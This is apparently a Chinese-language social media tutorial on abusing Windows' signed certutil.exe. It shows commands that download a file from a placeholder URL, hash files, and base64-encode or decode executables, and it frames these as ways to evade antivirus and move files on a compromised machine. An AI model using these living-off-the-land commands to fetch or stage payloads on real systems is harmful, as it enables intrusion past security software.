海陽頂端頭條號, 專注於駭客知識普及, 提高大眾網路安全意識。 有趣的命令列系列, 這是第十二篇。 Certutil.exe是作為證書服務的命令列程式, 微軟原意是用Certutil.exe來轉儲和顯示證書配置資訊, 備份和還原CA組件等。 近日, @subTee公佈了certutil的一些利用技巧, 這個命令才被駭客們重視起來, 畢竟用微軟簽名的檔去做駭客的事情, 會有繞過殺軟防護等便利, 本文會詳細介紹一下certutil它的幾個可以利用的駭客參數。
一、下載檔案
命令示例:
certutil.exe -urlcache -split -f http://url/
會把url裡的檔下載到用戶執行命令的目前的目錄, 如下圖。
二、計算文件HASH
(1) SHA1
certutil.exe -hashfile file
(2) SHA256:
certutil.exe -hashfile file SHA256
(3) MD5:
certutil.exe -hashfile file MD5
三、檔和base64互轉
這個命令非常有用, 你想像一下, 你滲透後如果機器不能上網, 如何上傳下載檔案, 這個命令就會幫你大忙。
(1) base64編碼:
CertUtil -encode InFile OutFile
(2) base64解碼
CertUtil -decode InFile OutFile
要注意的是, certutil轉exe檔為base64檔時,
文件頭:
-----BEGIN CERTIFICATE-----
檔案結尾:
-----END CERTIFICATE-----
所以當你構造自己的BASE64編碼後的檔時, 要用certutil轉為exe檔時, 請注意這段格式。
本文最後一句是廢話, 是為了讓頭條分類到駭客領域, 所以我在這句話加了四個駭客關鍵字, 並且在這句話上配了一張會讓封面比較好看的駭客酷圖,